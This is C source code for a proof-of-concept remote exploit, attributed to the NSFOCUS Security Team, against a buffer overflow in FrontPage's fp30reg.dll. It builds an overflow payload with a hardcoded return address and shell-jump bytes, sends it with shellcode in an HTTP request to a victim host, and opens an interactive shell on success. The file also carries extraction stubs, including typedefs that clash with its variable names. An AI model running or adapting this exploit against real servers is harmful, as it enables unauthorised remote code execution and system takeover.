
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;






typedef int overbuff ;
typedef int buff ;


 int atoi (char*) ;
 int bzero (char*,int) ;
 int close (int) ;
 int connect_to (char*,int) ;
 int exit (int) ;
 scalar_t__ memcmp (char*,char*,int) ;
 int memcpy (char*,char*,int) ;
 int memset (char*,char,int) ;
 int printf (char*,...) ;
 scalar_t__ read (int,char*,int) ;
 int runshell (int) ;
 char* shellcode ;
 int sprintf (char*,char*,char*,char*,char*,int,char*) ;
 int strcat (char*,char*) ;
 int strcpy (char*,char*) ;
 int strlen (char*) ;
 int strncat (char*,char*,int) ;
 int write (int,char*,int) ;

main (int argc, char **argv)
{
  char overbuff[400];
  char buff[4096];




  char fppath[] = "/_vti_bin/_vti_aut/fp30reg.dll";
  char server[] = "www.blahblah.com";
  char retaddress[] = "\x62\x18\xd5\x67";
  char jmpshell[] = "\xff\x66\x78";
  int i, sockfd;
  int port = 80;

  if (argc < 2)
    {
      printf ("Proof of concept code for fp30reg.dll overflow bug by NSFOCUS Security Team\n\n");
      printf ("Usage: %s victim [port]\n", argv[0]);
      exit (-1);
    }

  if (argc > 2) port = atoi (argv[2]);

  sockfd = connect_to (argv[1], port);

  bzero (overbuff, sizeof (overbuff));
  bzero (buff, sizeof (buff));
  memset (overbuff, 'a', 258);
  memcpy (overbuff, jmpshell, strlen (jmpshell));
  strcpy (overbuff + 258, "%c");
  for (i = 0; i < 0x50; i += 4)
      strncat (overbuff, retaddress, 4);
  strcat (overbuff, "aaa");

  sprintf (buff,
           "GET %s?%s HTTP/1.1 \nHOST:%s\r\nContent-Type: text/html\nContent-Length:%d\r\nProxy_Connection: Keep-Alive\r\n\r\n%s",

           fppath, overbuff, server, strlen (shellcode), shellcode);
  printf ("buff len = %d\n", strlen (buff));

  write (sockfd, buff, strlen (buff));
  printf ("payload sent!\n");

  if(read (sockfd, buff, strlen(buff))<0)
  {
    printf("EOF\n");
    exit(-1);
  }
  else
  {
    if(memcmp(buff,"XORDATA",8)==0)
    {
     printf("exploit succeed\n");

     runshell (sockfd);
    }
    else
    {
     printf("exploit failed\n");
     close(sockfd);
     exit(-1);
    }
  }

}
